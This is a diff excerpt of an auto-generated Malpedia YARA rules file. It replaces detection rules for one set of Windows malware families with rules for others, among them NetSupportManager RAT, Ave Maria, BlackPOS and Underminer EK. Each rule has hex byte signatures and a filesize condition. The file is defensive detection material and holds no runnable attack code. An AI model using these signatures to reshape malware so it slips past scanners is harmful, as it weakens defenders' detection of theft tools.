+		$sequence_5 = { 4c3bff 4d0f42c7 4d85c0 7504 33c0 eb05 e8???????? }
+		$sequence_6 = { 4c0f47c2 4d85c0 744a 482bf9 0fb7041f 0fb70b 48ffc2 }
+		$sequence_7 = { eb13 4983c8ff 0f1f440000 49ffc0 43803c0200 75f6 498bd2 }
+		$sequence_8 = { 488939 4885ff 783f 48b800000000ffffffff c7411006320000 ba063a0000 }
+		$sequence_9 = { 498bd5 488bcb e8???????? 84c0 0f84f4feffff eb1e 4c8b6c2438 }
 
 	condition:
-		7 of them and filesize < 597872
+		7 of them and filesize < 2654208
 }
-rule MALPEDIA_Win_Corebot_Auto : FILE
+rule MALPEDIA_Win_Zhcat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3997db80-c772-5b73-a963-36ab17758ace"
+		id = "632a3d5c-2d89-5179-ac16-c2aceba5bbfa"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.corebot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.corebot_auto.yar#L1-L174"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zhcat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zhcat_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "39cc93a6c914fbc005d1108deabcbfdb71a7ef825d8251a576b5ab326c580118"
+		logic_hash = "1660d8f51e51dd71d6a1d9261fb6addc44fa7696401b7d8f6127a7c99ca1c719"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128785,38 +129159,32 @@ rule MALPEDIA_Win_Corebot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 31f6 46 8918 89f0 83c40c 5e 5f }
-		$sequence_1 = { 31f6 8955e8 894dec 43 8b4dec 8d55f0 e8???????? }
-		$sequence_2 = { 0fb618 895de8 c745ec07000000 8d141b 84db 8955e8 }
-		$sequence_3 = { 31c0 40 8932 5e c3 31c0 ebfa }
-		$sequence_4 = { 50 e8???????? 83c404 29f7 01f3 8b75ec 56 }
-		$sequence_5 = { 50 ff15???????? 85c0 7418 8b0e }
-		$sequence_6 = { 51 ff15???????? 85c0 0f95c0 eb08 c70600000000 31c0 }
-		$sequence_7 = { 0fb610 8955e8 c745ec07000000 8d0412 84d2 8945e8 783f }
-		$sequence_8 = { e8???????? 807e5800 7509 ff7654 ff15???????? 807e5000 }
-		$sequence_9 = { ff15???????? 8d4634 50 ff15???????? 8d4e0c e8???????? }
-		$sequence_10 = { eb10 6800800000 6a00 56 }
-		$sequence_11 = { ff7010 ff7014 e8???????? 8b45e0 }
-		$sequence_12 = { 85ff 740f 57 ff7508 }
-		$sequence_13 = { ff15???????? 807e5000 7509 ff764c ff15???????? 8d4634 50 }
-		$sequence_14 = { ff742428 e8???????? 8b442424 8d4c2410 }
-		$sequence_15 = { 85c0 7515 8b4624 3b4620 }
+		$sequence_0 = { 7537 68???????? e8???????? e9???????? 8b35???????? }
+		$sequence_1 = { 53 ffd6 8945f4 8d45f0 }
+		$sequence_2 = { c705????????02000000 eb1c c605????????01 eb13 c705????????01000000 eb07 c605????????01 }
+		$sequence_3 = { 59 e9???????? 8b36 8bce c1f905 8b0c8d40604100 }
+		$sequence_4 = { 83c418 53 ff750c 8bf0 8d0437 50 e8???????? }
+		$sequence_5 = { ffd7 6a02 8945d8 58 ff7514 668945c4 ffd6 }
+		$sequence_6 = { c1f905 8b0c8d40604100 c1e006 8d44010c 50 }
+		$sequence_7 = { 68ff000000 e8???????? 59 59 8b7508 8d34f590444100 391e }
+		$sequence_8 = { 0fb63e 0fb6c0 eb12 8b45e0 8a80044a4100 08443b1d 0fb64601 }
+		$sequence_9 = { 8bfb f3a5 66a5 7424 }
 
 	condition:
-		7 of them and filesize < 1302528
+		7 of them and filesize < 376832
 }
-rule MALPEDIA_Win_New_Ct_Auto : FILE
+rule MALPEDIA_Win_Badflick_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f53de876-cc73-580f-b656-21e621d4769e"
+		id = "d5d1b93f-b8ef-5919-881c-41cd371c0e33"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.new_ct"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.new_ct_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.badflick"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.badflick_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "a95efc922552cce6ba568c288715d7230a5249b577e6fe1c26585a82d20cee63"
+		logic_hash = "254e8105548798f084c01ec737c733ae7316a19998160441541107c24531856e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128830,32 +129198,32 @@ rule MALPEDIA_Win_New_Ct_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c404 8b45e4 50 8b35???????? ffd6 }
-		$sequence_1 = { e8???????? a3???????? 3bc3 756f 47 83ff0a 7cd4 }
-		$sequence_2 = { ffd6 8b4c241c 51 ffd6 55 6a00 ff15???????? }
-		$sequence_3 = { 52 68???????? 8d842480000000 68???????? 50 ffd6 }
-		$sequence_4 = { 3931 740c 40 83c10c 3bc2 7cf4 33c0 }
-		$sequence_5 = { 6a04 8d8dd4fdffff 51 6a4a }
-		$sequence_6 = { 50 6a00 6a00 68???????? 6a00 68???????? ff15???????? }
-		$sequence_7 = { e8???????? 83c404 8985c4ebffff 85c0 7409 8bc8 e8???????? }
-		$sequence_8 = { ffd3 83c414 c745fcffffffff b801000000 }
-		$sequence_9 = { 33c0 83c40c f2ae f7d1 49 6800000020 8d84247c070000 }
+		$sequence_0 = { ff35???????? 8d85ecfbffff ff35???????? 68???????? ff35???????? 68???????? 68???????? }
+		$sequence_1 = { ff15???????? 85c0 0f8425010000 837dfc04 0f851b010000 }
+		$sequence_2 = { a5 a5 a5 e8???????? 33db 59 885d0b }
+		$sequence_3 = { ff15???????? 8bd8 83fbff 746b 56 }
+		$sequence_4 = { e9???????? 33db 395df8 74e2 6800800000 }
+		$sequence_5 = { 8bf0 68???????? 56 ff15???????? 85c0 0f85e7000000 6a01 }
+		$sequence_6 = { 56 ff15???????? 50 0fb706 50 }
+		$sequence_7 = { 8d85a8fbffff 50 7408 e8???????? }
+		$sequence_8 = { ff7508 ff15???????? 53 ff15???????? 5f }
+		$sequence_9 = { ff15???????? 32c0 eb3e ff7510 e8???????? 8bf0 }
 
 	condition:
-		7 of them and filesize < 122880
+		7 of them and filesize < 81920
 }
-rule MALPEDIA_Win_Megumin_Auto : FILE
+rule MALPEDIA_Win_Netsupportmanager_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "37ab0bcc-cdac-5d31-a456-2de10ec33215"
+		id = "65413a95-8602-50e7-8fc9-1bdaa9aea637"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.megumin"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.megumin_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.netsupportmanager_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.netsupportmanager_rat_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "a365528e95f0493decec29de859395bb6581a0dddcbbf2af0b80b92938590fb4"
+		logic_hash = "0f21dd65c8f16f53e4a346f9dcfa8568aaa15104451879c8529729394d81f81d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128869,32 +129237,32 @@ rule MALPEDIA_Win_Megumin_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 4f 83c404 33c9 ba10000000 83ff03 771a }
-		$sequence_1 = { 51 e8???????? 83c40c 8d4344 6803010000 ffb558feffff 6804010000 }
-		$sequence_2 = { 2bf9 8b8d88feffff 8bc2 2bc1 57 3bf8 7734 }
-		$sequence_3 = { 83fa38 57 0f43c1 8bce 50 }
-		$sequence_4 = { c745bc00000000 6a00 8d4db0 c645fc03 e8???????? 6a24 }
-		$sequence_5 = { 83ef01 75d9 6a40 8d4e01 57 51 }
-		$sequence_6 = { 0f85cf000000 83bd60ffffff10 8d8d4cffffff 8b955cffffff 0f438d4cffffff 6a04 68???????? }
-		$sequence_7 = { 84c0 7555 6a25 b9???????? }
-		$sequence_8 = { c74584ffffffff 6a64 8d4588 50 ff15???????? 8d7d88 }
-		$sequence_9 = { 6a00 ff15???????? 8d8df8f8ffff e8???????? 83781410 7202 8b00 }
+		$sequence_0 = { e8???????? 8b9630010000 6a00 52 e8???????? 8b4614 83c420 }
+		$sequence_1 = { f6868000000002 745a f6868402000007 7451 8b4e68 8b3d???????? 6a03 }
+		$sequence_2 = { e8???????? eb4b 894508 894e1c 8945f0 85c0 c645fc05 }
+		$sequence_3 = { e8???????? e9???????? 8b06 8d4d08 51 8bce ff9098000000 }
+		$sequence_4 = { e8???????? c705????????01000000 8b15???????? 52 ff15???????? 5f 5e }
+		$sequence_5 = { e8???????? 8b45fc 8b4df4 8bd0 2bd1 52 8b55f8 }
+		$sequence_6 = { ff15???????? 8b4e28 6810200000 57 8d8500ffffff 6aff 50 }
+		$sequence_7 = { ff15???????? eb03 8b5de0 c745fcffffffff e8???????? 33c0 8b8d60ffffff }
+		$sequence_8 = { ff5008 8d4ddc e8???????? 8b45dc 8d4ddc ff10 84c0 }
+		$sequence_9 = { f3a5 8bc8 83e103 f3a4 81fa03000d00 750d 8d55c4 }
 
 	condition:
-		7 of them and filesize < 1007616
+		7 of them and filesize < 4734976
 }
-rule MALPEDIA_Win_Blackpos_Auto : FILE
+rule MALPEDIA_Win_Chewbacca_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "89c6782b-ce89-5ae6-b33e-9ad6b6b135a4"
+		id = "390231b1-3e2b-54db-9803-32024f965f10"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackpos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.blackpos_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chewbacca"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.chewbacca_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "7d2d90e306d11c41271f7c0e9630f3392beaf89b6698e039f543a5fdf586b172"
+		logic_hash = "e7a38996a98134785fc7654ab24d9b2f764c6a77f5e2b53f68cf035bd47e7345"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128908,32 +129276,32 @@ rule MALPEDIA_Win_Blackpos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 40 50 ffd6 85c0 7507 e8???????? eb27 }
-		$sequence_1 = { 46 83bddcfbffff1e 0f8c44ffffff 807d2000 754a }
-		$sequence_2 = { 80f920 7205 80f97f 7204 c6041021 }
-		$sequence_3 = { 8bec 81ec48040000 a1???????? 33c5 8945fc 8b450c 8985ccfbffff }
-		$sequence_4 = { c745c021282a28 c745c44d4d4d4d c745c84d4d4d4d c745cc4d4d4d4d c745d04d4d4d4d c745d44d4d4d4d }
-		$sequence_5 = { 50 8d85b8f4ffff 50 53 6800000008 6a01 53 }
-		$sequence_6 = { bf???????? 833cf544ee410001 751d 8d04f540ee4100 8938 68a00f0000 ff30 }
-		$sequence_7 = { 3bc6 0f848e000000 68b80b0000 6a01 56 }
-		$sequence_8 = { 8bf8 897dd4 8b5dd0 ebab c745e42c824100 817de438824100 7311 }
-		$sequence_9 = { 7e33 89b5b4f4ffff 6a14 8d45bc 50 }
+		$sequence_0 = { c744240cf2020000 89442408 c7442404???????? a1???????? 83c040 890424 e8???????? }
+		$sequence_1 = { e8???????? e8???????? 83b83003000000 7505 bb???????? 89d8 83c428 }
+		$sequence_2 = { c7442408???????? c744240400080000 c7042406000000 e8???????? 8b442454 890424 e8???????? }
+		$sequence_3 = { c744240400100000 c7042403000000 e8???????? c70424???????? e8???????? c7442414003b6800 c7442410ee3d6800 }
+		$sequence_4 = { c7442408???????? c744240400100000 c7042403000000 e8???????? c70424???????? e8???????? c74424140c136800 }
+		$sequence_5 = { ff8bc0000000 837c243800 7410 39f3 740c 895c2404 892c24 }
+		$sequence_6 = { a1???????? ffd2 eb05 b8???????? 8918 e8???????? 5b }
+		$sequence_7 = { ff5270 85d2 7f0d 0f8c7b000000 3d00000100 7274 8d954cffffff }
+		$sequence_8 = { e8???????? b801000000 8d5598 8d4db4 e8???????? e8???????? 50 }
+		$sequence_9 = { e8???????? 8b4308 8b10 8b4004 f7d0 f7da 83d8ff }
 
 	condition:
-		7 of them and filesize < 3293184
+		7 of them and filesize < 9764864
 }
-rule MALPEDIA_Win_Webmonitor_Auto : FILE
+rule MALPEDIA_Win_Lcpdot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a4fb11db-5000-556c-8a5e-92fa710a7bf2"
+		id = "722ca0df-2e50-52e0-943d-1427766ffd0e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webmonitor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.webmonitor_auto.yar#L1-L159"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lcpdot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lcpdot_auto.yar#L1-L164"
 		license_url = "N/A"
-		logic_hash = "dae97ec3da1552d8829942df4314bf12da735041179d90d1884bc5549bf4d3f9"
+		logic_hash = "4f9e99ce8bcf6813bbe31f126896fdedd8b3b4250e6a5e72eec4968c5a5d08a6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128947,38 +129315,37 @@ rule MALPEDIA_Win_Webmonitor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 72ff 800c0043 6c ff8010004368 ff1e 0a01 800c004a }
-		$sequence_1 = { 43 ec fe04ec fe05???????? 000d???????? 04c8 }
-		$sequence_2 = { a4 44 43 00dc 7442 000477 }
-		$sequence_3 = { 41 0084e84100a872 42 00a06a4200f8 b642 }
-		$sequence_4 = { 3a58ff 2503fd006c ff1e e00e 000e }
-		$sequence_5 = { ff05???????? 000d???????? 04b8 fe04f4 fd }
-		$sequence_6 = { 41 00baa4f34100 b9???????? ffe1 ba???????? }
-		$sequence_7 = { 0512002413 000d???????? 04f4 fd 0468 ff05???????? }
-		$sequence_8 = { 00e8 dd7000 008bf98b5d1c 8d4de4 }
-		$sequence_9 = { 00d1 6848007269 48 00856948008b }
-		$sequence_10 = { 0108 eb5a 8b4508 83ceff }
-		$sequence_11 = { 0108 8b442410 891e 894604 }
-		$sequence_12 = { 00d1 6848004069 48 00d1 }
-		$sequence_13 = { 000f b681 fc b84500ff24 }
-		$sequence_14 = { 00e8 f61c00 008bd9895df0 8b451c }
-		$sequence_15 = { 00856948008b ff558b ec 83ec0c }
+		$sequence_0 = { e9???????? c705????????01000000 e8???????? 83f801 }
+		$sequence_1 = { 41b804000000 e8???????? 85c0 400f94c6 8bc6 488bac24a8080000 4c8ba42460080000 }
+		$sequence_2 = { 8b4e10 51 ffd7 5f 5e c3 55 }
+		$sequence_3 = { e8???????? 488d542420 488bcb 41b8e8030000 e8???????? b801000000 }
+		$sequence_4 = { 8b95a8fbffff 89480c 895010 897014 897818 a1???????? }
+		$sequence_5 = { 51 c785f8f3ffff80f10000 ff15???????? 391f 7515 5f 5e }
+		$sequence_6 = { 57 4883ec20 488b7940 4c8bc2 488bd9 488b5708 }
+		$sequence_7 = { 8a4001 3a4101 752b 57 ff15???????? }
+		$sequence_8 = { 8d4620 83c40c 8d5002 8d9b00000000 668b08 83c002 }
+		$sequence_9 = { 8bd0 8bf0 ff15???????? 488bd8 4885c0 751b }
+		$sequence_10 = { e8???????? 48baeea7c64b37894100 4c8bd8 488b4348 482bd0 4883fa01 }
+		$sequence_11 = { dc35???????? 8b3d???????? dd9dacfbffff 33c0 }
+		$sequence_12 = { b940000000 8bd3 4c89a42450020000 448be3 ff15???????? }
+		$sequence_13 = { c785d8fdffff484d5bd2 c785dcfdffff03071c2a c785e0fdffff48a02861 c785e4fdffff82060fb1 }
+		$sequence_14 = { 4533c9 48c744243000000000 458d4103 ba00000040 c744242880000000 48896c2468 }
 
 	condition:
-		7 of them and filesize < 1867776
+		7 of them and filesize < 257024
 }
-rule MALPEDIA_Win_Virtualgate_Auto : FILE
+rule MALPEDIA_Win_Ave_Maria_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "532683a6-8cc0-5db0-a44c-3ae7cc350778"
+		id = "a8ff9385-aecd-5e0a-9dbf-bb5ae67ce3ce"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.virtualgate"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.virtualgate_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ave_maria_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "88ee3ecdf07b44d4f393563ecf7e06ea2c4377ec1fc56b55a448fb7ea043998d"
+		logic_hash = "059225085d94bd881b5977004829f436c6d9d9c9b3e6a06c534e4dec388c260c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128992,32 +129359,32 @@ rule MALPEDIA_Win_Virtualgate_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 2bd1 83fa0f 777a 8b8c96b0270100 }
-		$sequence_1 = { 482bd6 4a0fbebc3820190200 8d4f01 4863c1 483bc2 0f8f15020000 83f904 }
-		$sequence_2 = { 488b03 833800 7513 488d151df90000 488d0df6f80000 e8???????? }
-		$sequence_3 = { 5d c3 488d05559a0100 488905???????? }
-		$sequence_4 = { 0100 682601006f 260100 7626 0100 7d26 }
-		$sequence_5 = { eb03 48ffc1 8a01 413ac3 }
-		$sequence_6 = { c3 4885d2 74e1 33ff 66897c2450 b020 eb03 }
-		$sequence_7 = { 488bce e8???????? 85c0 0f854d010000 33d2 }
-		$sequence_8 = { 49ffc0 48ffc2 493bd1 7427 418a00 8ac8 }
-		$sequence_9 = { e8???????? 44386dcf 7409 488b4db7 e8???????? 44386dff 7409 }
+		$sequence_0 = { 8165e800ff00ff c1c008 25ff00ff00 894df8 0945e8 8bc7 33c2 }
+		$sequence_1 = { 8bcf e8???????? 8d4de0 e8???????? 33f6 e9???????? e8???????? }
+		$sequence_2 = { 50 e8???????? 8d4c2424 e8???????? 46 3b770c 7293 }
+		$sequence_3 = { e8???????? 897e34 ff15???????? 5f 5e c20400 55 }
+		$sequence_4 = { 56 57 57 57 53 6801000080 ff15???????? }
+		$sequence_5 = { 85f6 742c 8b5004 2bf2 ff750c 8b08 83c2f8 }
+		$sequence_6 = { 81ce00ffffff 46 8b4df8 8a040e 88040f 47 881c0e }
+		$sequence_7 = { 50 50 8d45f8 50 8d85f0cfffff 50 53 }
+		$sequence_8 = { 8b07 5f 8b443004 5e 894304 5b 5d }
+		$sequence_9 = { 83ec18 53 8b5d08 56 57 8bf9 53 }
 
 	condition:
-		7 of them and filesize < 323584
+		7 of them and filesize < 237568
 }
-rule MALPEDIA_Win_Diztakun_Auto : FILE
+rule MALPEDIA_Win_Hunter_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b37620d3-10d5-5e3b-870d-9fcc520704b1"
+		id = "114c619e-d3db-54d7-bef7-7645d901bc94"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.diztakun"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.diztakun_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hunter"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hunter_auto.yar#L1-L90"
 		license_url = "N/A"
-		logic_hash = "a3712f3787a19a9586caeb79806d7a5b14b9c57af185546c9c7b23f90c084141"
+		logic_hash = "776a5d8eb049aeb15b1138e40f903b0e7294cf0475240df008d707aa37c36610"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129031,32 +129398,30 @@ rule MALPEDIA_Win_Diztakun_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 8b01 ffd0 8b442404 }
-		$sequence_1 = { 89842410020000 57 a1???????? 33c4 50 8d84241c020000 64a300000000 }
-		$sequence_2 = { 7469 85ff 7465 8b442440 85c0 }
-		$sequence_3 = { 8b7710 8b04b5a4914400 53 6a04 ff75f0 99 ff75ec }
-		$sequence_4 = { 8b4de0 8d0c8d60d74400 8901 8305????????20 8d9000080000 }
-		$sequence_5 = { 8b2d???????? 52 ffd5 85db 7435 8d442414 50 }
-		$sequence_6 = { 51 8d542420 52 50 50 50 50 }
-		$sequence_7 = { b8???????? a3???????? c705????????4fd34200 c705????????03d34200 }
-		$sequence_8 = { 8bcc 8964241c 50 e8???????? 51 8bcc 89642434 }
-		$sequence_9 = { 8b1f 6a00 8dafa8000000 6a03 c7450000000000 e8???????? 8b5354 }
+		$sequence_0 = { 0000 9c 35a035a435 a835 }
+		$sequence_1 = { 0145f4 8d45b4 8b55f0 8b4de4 }
+		$sequence_2 = { 01442428 59 11742428 85db }
+		$sequence_3 = { 0145e8 8d838e000000 3bc2 8b45e8 }
+		$sequence_4 = { 01442444 53 11542444 51 }
+		$sequence_5 = { 0103 115304 e9???????? 8b4c241c }
+		$sequence_6 = { 014140 89413c 899604010000 e9???????? }
+		$sequence_7 = { 00443907 8a043a 88043b 8a443a01 }
 
 	condition:
-		7 of them and filesize < 688128
+		7 of them and filesize < 1056768
 }
-rule MALPEDIA_Win_Absentloader_Auto : FILE
+rule MALPEDIA_Win_Underminer_Ek_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4910d41c-fd9d-58f5-8e0b-80462a82048c"
+		id = "f11b78f3-676c-503e-af81-133bd7b27942"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.absentloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.absentloader_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.underminer_ek"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.underminer_ek_auto.yar#L1-L176"
 		license_url = "N/A"
-		logic_hash = "247d6cfb768e4552d66056adfd67fbf6ee95131ccc4d55998852773c9971750b"
+		logic_hash = "2f91a4d4f297062b3d3b07b58a9c1bfef73e9c0060b6e1680dc04cf736854cd4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129070,32 +129435,38 @@ rule MALPEDIA_Win_Absentloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d4ddc e8???????? 83c610 3bf7 75f0 8b7dc8 eb3c }
-		$sequence_1 = { 66c745f8722e 8b08 a1???????? 3b8104000000 7e33 56 be74a806fd }
-		$sequence_2 = { 0fb60438 8a88901a06fd 8ac2 c0e804 c0e102 0ac8 c0e204 }
-		$sequence_3 = { ff75f4 8b09 8b01 ff5004 5f 5e 5b }
-		$sequence_4 = { a5 e8???????? 59 59 8bf0 8b8d5cffffff 8d8520ffffff }
-		$sequence_5 = { 0f844c040000 8d4590 50 8d4ddc e8???????? 33d2 42 }
-		$sequence_6 = { e8???????? 833d????????ff 59 7520 8b45f4 68800705fd a3???????? }
-		$sequence_7 = { e8???????? 56 8d8d68faffff c645fc2e }
-		$sequence_8 = { 03cf 03c7 0fb70470 8b0481 8d8de4f3ffff 51 8d8df0f3ffff }
-		$sequence_9 = { 8b0c8de8a006fd 804c112802 5b 2bf7 83e6fe 5f 8bc6 }
+		$sequence_0 = { b9???????? c7431000000000 8d5101 c743140f000000 c60300 0f1f8000000000 }
+		$sequence_1 = { 8d0c76 8b048f 89430c 8b448f08 33db 33c9 33d2 }
+		$sequence_2 = { 8b0485582c4300 8945d0 81f9e9fd0000 0f852d010000 8b55b4 83c02e }
+		$sequence_3 = { 7618 8b4dec 50 8b4704 0301 50 8b47fc }
+		$sequence_4 = { eb1b 8b0c95582c4300 8a443928 a840 7508 0c02 88443928 }
+		$sequence_5 = { 8945fc 8b7dfc 8b470c 3bc3 7437 }
+		$sequence_6 = { e8???????? 8d4dd0 e8???????? 8bf4 8bf8 83ec18 }
+		$sequence_7 = { c3 8b442404 8325????????00 a3???????? 8b442408 a3???????? }
+		$sequence_8 = { 25ffff0000 eb07 03c7 6a00 83c002 }
+		$sequence_9 = { 7408 3b5d14 7351 8d0c13 51 50 56 }
+		$sequence_10 = { 83f81f 0f8767110000 52 51 }
+		$sequence_11 = { 7474 807dfd03 7540 84d2 740c b9da51fa7e }
+		$sequence_12 = { 3cb8 3cc2 3cd3 3cd8 3ce2 3cf3 }
+		$sequence_13 = { e8???????? 3bde 7412 0fb603 8bcf }
+		$sequence_14 = { 8d7dc2 66895dc0 ff7508 895dec ab ff760c }
+		$sequence_15 = { 0f42c1 a3???????? 8b8584feffff 83f806 7545 }
 
 	condition:
-		7 of them and filesize < 794624
+		7 of them and filesize < 466944
 }
-rule MALPEDIA_Win_Huskloader_Auto : FILE
+rule MALPEDIA_Win_Komprogo_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2b71c66f-6603-595c-99bb-89c942583260"
+		id = "c9a48c86-1d10-5914-97e5-45787475f04f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.huskloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.huskloader_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.komprogo"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.komprogo_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "0b5c5ed5027920c73090f364afb1f0be41c97145cf9de72e357bac2712d50fca"
+		logic_hash = "a0932a9f38d23a8c7cc40d2bb7fb17066e556ed1703c6642f0b68427cdf44c0d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129109,32 +129480,32 @@ rule MALPEDIA_Win_Huskloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bc7 83e03f 6bc838 8b0495e88d0110 }
-		$sequence_1 = { 59 e9???????? c745e003000000 e9???????? c745e4c05e0110 ebb8 d9e8 }
-		$sequence_2 = { 6a00 681f000f00 50 ff15???????? 85c0 }
-		$sequence_3 = { 740e 50 e8???????? 83a6e88d011000 59 83c604 81fe00020000 }
-		$sequence_4 = { 8d043b 8b3485601f0110 8d4601 8945fc 8a06 46 }
-		$sequence_5 = { 57 8bb81c060000 6a40 6800300000 56 6a00 ff15???????? }
-		$sequence_6 = { 85c0 7411 8b35???????? b98b010000 }
-		$sequence_7 = { 7420 6bc618 57 8db8288c0110 57 ff15???????? }
-		$sequence_8 = { 8b35???????? 85f6 7420 6bc618 57 8db8288c0110 57 }
-		$sequence_9 = { 0fb704850c3b0110 8d048508320110 50 8d8590faffff 03c7 50 }
+		$sequence_0 = { 899638930300 8d96488e0300 899680940300 8986a1910200 8986aa910200 8d86ac700300 }
+		$sequence_1 = { 899674be0300 899ed7720000 8d86052a0000 89869cbe0300 8d9690be0300 8996b0be0300 8d863b6e0300 }
+		$sequence_2 = { 8d8618720300 898613b40000 8d8676490000 8986bcb90300 8d8e80920200 898e4c920200 89bed5b40000 }
+		$sequence_3 = { 8986cd530200 8d8674700300 8986e1530200 8d8614930200 8986c8920200 8d86f0380400 }
